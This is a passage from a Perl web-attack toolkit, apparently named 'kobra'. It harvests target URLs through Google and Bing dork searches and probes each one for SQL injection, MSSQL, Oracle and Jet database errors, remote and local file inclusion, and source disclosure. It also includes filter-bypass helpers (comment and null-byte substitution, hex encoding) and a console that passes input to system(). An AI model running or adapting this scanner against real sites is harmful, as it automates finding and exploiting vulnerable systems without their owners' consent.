2014. if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
2015. printear("[+] Jet DB : $page\a\n","text","11","5");
2016. savefile("jetdb-logs.txt",$page);
2017. }
2018. }
2019.  
2020. sub mssql {
2021.  
2022. my $page = shift;
2023. $code1 = toma($page."'");
2024. if ($code1=~/ODBC SQL Server Driver/ig) {
2025. printear("[+] MSSQL : $page\a\n","text","11","5");
2026. savefile("mssql-logs.txt",$page);
2027. }
2028. }
2029.  
2030. sub oracle {
2031.  
2032. my $page = shift;
2033. $code1 = toma($page."'");
2034. if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
2035. printear("[+] Oracle : $page\a\n","text","11","5");
2036. savefile("oracle-logs.txt",$page);
2037. }
2038. }
2039.  
2040. sub rfi {
2041. my $page = shift;
2042. $code1 = toma($page."http:/www.supertangas.com/");
2043. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
2044. printear("[+] RFI : $page\a\n","text","11","5");
2045. savefile("rfi-logs.txt",$page);
2046. }}
2047.  
2048. sub lfi {
2049. my $page = shift;
2050. $code1 = toma($page."'");
2051. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
2052. printear("[+] LFI : $page\a\n","text","11","5");
2053. savefile("lfi-logs.txt",$page);
2054. }}
2055.  
2056. sub fsd {
2057. my $page = shift;
2058. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
2059. if ($path=~/\/(.*)$/) {
2060. my $me = $1;
2061. $code1 = toma($page.$me);
2062. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
2063. printear("[+] Full Source Discloure : $page\a\n","text","11","5");
2064. savefile("fpd-logs.txt",$page);
2065. }}}
2066.  
2067. sub men {
2068. printear("\n\n[+] Scan Type : \n\n","text","5","5");
2069. printear("
2070. [X] : XSS
2071. [S] : SQL GET/POST
2072. [K] : SQL GET
2073. [Q] : SQL GET + Admin
2074. [Y] : Directory listing
2075. [M] : MSSQL
2076. [J] : Jet Database
2077. [O] : Oracle
2078. [L] : LFI
2079. [R] : RFI
2080. [F] : Full Source Discloure
2081. [HT] : HTTP Information
2082. [A] : All
2083. ","text","13","5");
2084. my $option  = printear("\n[Options] : ","stdin","11","13");
2085. return $option;
2086. }
2087.  
2088. sub finish_now {
2089. printear("\n\n[+] Finished\n\n","text","13","5");
2090. <stdin>;
2091. estoydentro();
2092. }
2093.  
2094. sub bing {
2095.  
2096. my($a,$b) = @_;
2097. for ($pages=10;$pages<=$b;$pages=$pages+10) {
2098. my $code = toma("http://www.bing.com/search?q=".$a."&first=".$pages);
2099.  
2100. while($code=~/<h3><a href="(.*?)"/mig) {
2101. push(@founds,$1);
2102. }
2103. }
2104. my @founds = repes(cortar(@founds));
2105. return @founds;
2106. }
2107.  
2108. sub google {
2109. my($a,$b) = @_;
2110. my @founds;
2111. for ($pages=10;$pages<=$b;$pages=$pages+10) {
2112. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
2113. while($code=~/(?<="r"><. href=")(.+?)"/mig) {
2114. my $url = $1;
2115. if($url=~/\/url\?q\=(.*?)\&amp\;/) {
2116. push(@founds,uri_unescape($1));
2117. }}}
2118. my @founds = repes(cortar(@founds));
2119. return @founds;
2120. }
2121.  
2122. } ##
2123.  
2124. sub load_cmd {
2125.  
2126. head_console();
2127.  
2128. sub head_console {
2129. clean();
2130. printear("
2131.  
2132.  
2133.  @@@@   @@@@   @    @   @@@    @@@@   @     @@@@@
2134. @    @ @    @  @@   @  @   @  @    @  @     @    
2135. @      @    @  @@   @  @      @    @  @     @    
2136. @      @    @  @ @  @  @      @    @  @     @    
2137. @      @    @  @ @  @   @@@   @    @  @     @@@@
2138. @      @    @  @  @ @      @  @    @  @     @    
2139. @      @    @  @   @@      @  @    @  @     @    
2140. @    @ @    @  @   @@  @   @  @    @  @     @    
2141.  @@@@   @@@@   @    @   @@@    @@@@   @@@@@ @@@@@
2142.  
2143.  
2144.  
2145. ","text","7","5");
2146. }
2147.  
2148. while(1) {
2149. my $cmd  = printear("\n\n[+] Command : ","stdin","11","13");
2150. print "\n\n";
2151. if($cmd eq "exit") {
2152. printear("\n\n[+] Finished\n\n","text","13","5");
2153. <stdin>;
2154. estoydentro();
2155. } else {
2156. my $data = getdatanownownownow();
2157. if($data=~/colors=n/) {
2158. system($cmd);
2159. } else {
2160. cprint "\x037";
2161. system($cmd);
2162. cprint "\x030";
2163. }
2164. }
2165. }
2166.  
2167. } ##
2168.  
2169.  
2170. ##
2171.  
2172. ##Funciones secundarias ###
2173.  
2174. sub toma {
2175. return $nave->get($_[0])->content;
2176. }
2177.  
2178. sub tomados {
2179. return $nave->get($_[0]);
2180. }
2181.  
2182. sub tomar {
2183. my ($web,$var) = @_;
2184. return $nave->post($web,[%{$var}])->content;
2185. }
2186.  
2187. sub ver_length {
2188. return true if length($_[0]) == 32;
2189. }
2190.    
2191. sub savefile {
2192. open(SAVE,">>logs/".$_[0]);
2193. print SAVE $_[1]."\n";
2194. close SAVE;
2195. }
2196.  
2197. sub get_links {
2198.  
2199. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
2200. return @links;
2201.  
2202. sub agarrar {
2203. my ( $a, %b ) = @_;
2204. push( @links, values %b );
2205. }}
2206.  
2207. sub savefilear {
2208. open (SAVE,">>logs/webs/".$_[0]);
2209. print SAVE $_[1]."\n";
2210. close SAVE;
2211. }
2212.  
2213. sub partimealmedio {
2214. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
2215. my $save = $auth;
2216. $save=~s/:/_/;
2217. return $save;
2218. }
2219.  
2220. sub encode {
2221. my $string = $_[0];
2222. $hex = '0x';
2223. for (split //,$string) {
2224. $hex .= sprintf "%x", ord;
2225. }
2226. return $hex;
2227. }
2228.  
2229. sub decode {
2230. $_[0] =~ s/^0x//;
2231. $encode = join q[], map { chr hex } $_[0] =~ /../g;
2232. return $encode;
2233. }
2234.  
2235. sub bypass {
2236. if ($_[0] eq "/*") { return ("/**/","/**/"); }
2237. elsif ($_[0] eq "%20") { return ("%20","%00"); }
2238. else {return ("+","--");}}
2239.  
2240. sub ascii {
2241. return join ',',unpack "U*",$_[0];
2242. }
2243.  
2244. sub ascii_de {
2245. $_[0] = join q[], map { chr } split q[,],$_[0];
2246. return $_[0];
2247. }
2248.  
2249. sub installer_kobra {
2250. unless (-d "/logs/webs") {
2251. mkdir("logs/",777);
2252. mkdir("logs/webs/",777);
2253. }
2254. }
2255.  
2256. sub cortar {
2257. my @nuevo;
2258. for(@_) {
2259. if ($_ =~/=/) {
2260. @tengo = split("=",$_);
2261. push(@nuevo,@tengo[0]."=");
2262. } else {
2263. push(@nuevo,$_);
2264. }}
2265. return @nuevo;
2266. }
2267.  
2268. sub installer_par {
2269. unless (-d "logs/") {
2270. mkdir("logs/","777");
2271. }
2272. }
2273.  
2274. sub repes {
2275. my @limpio;
2276. foreach $test(@_) {
2277. push @limpio,$test unless $repe{$test}++;
2278. }
2279. return @limpio;
2280. }
2281.  
2282. sub savewords {
2283. open(FILE,$_[0]);
2284. @words = <FILE>;
2285. close FILE;
2286. for(@words) {
2287. push(@r,$_);
2288. }  
2289. return(@r);
2290. }
2291.  
2292. sub getdatanownownownow {
2293. open my $FILE, q[<],"data.txt";
2294. my $word = join q[], <$FILE>;
2295. close   $FILE;
2296. return $word;
2297. }
2298.  
2299. ##
2300.  
2301. #The End ?